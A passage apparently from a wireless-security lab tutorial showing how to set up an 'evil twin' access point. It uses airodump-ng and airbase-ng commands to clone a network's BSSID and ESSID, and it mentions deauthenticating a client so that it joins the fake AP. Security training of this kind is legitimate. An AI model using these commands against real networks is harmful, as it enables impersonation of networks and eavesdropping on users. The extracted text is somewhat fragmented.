Follow these instructions to get started:
airodump-ng
to locate the access point's BSSID and ESSID, which we would like to emulate in the evil twin:airbase-ng
command. Minor errors may occur with newer releases:airodump-ng
screen.. It is important to note that you will need to run airodump-ng
in a new window with the following command:airodump-ng --channel 11 wlan0
Let's see this new access point:
airbase-ng –a <router mac> --essid "Wireless Lab" –c 11 mon0
airodump-ng
, it is almost impossible to differentiate between both visually:airodump-ng
is unable to discern that there are actually two different physical access points on the same channel. This is the most potent form of the evil twin.We created an evil twin for the authorized network and used a deauthentication attack to have the legitimate client connect back to us, instead of the authorized network access point.
It is important to note that, in the case of the authorized access point using encryption such as WEP/WPA, it might be more difficult to conduct an attack in which traffic eavesdropping is possible. We will take a look at how to break the WEP key with just a client using the Caffe Latte attack in a later chapter.
In the previous exercise, run the evil twin on different channels and observe how the client, once disconnected, hops channels to connect to the access point. What is the deciding factor based on which the client decides which access point to connect to? Is it signal strength? Experiment and validate.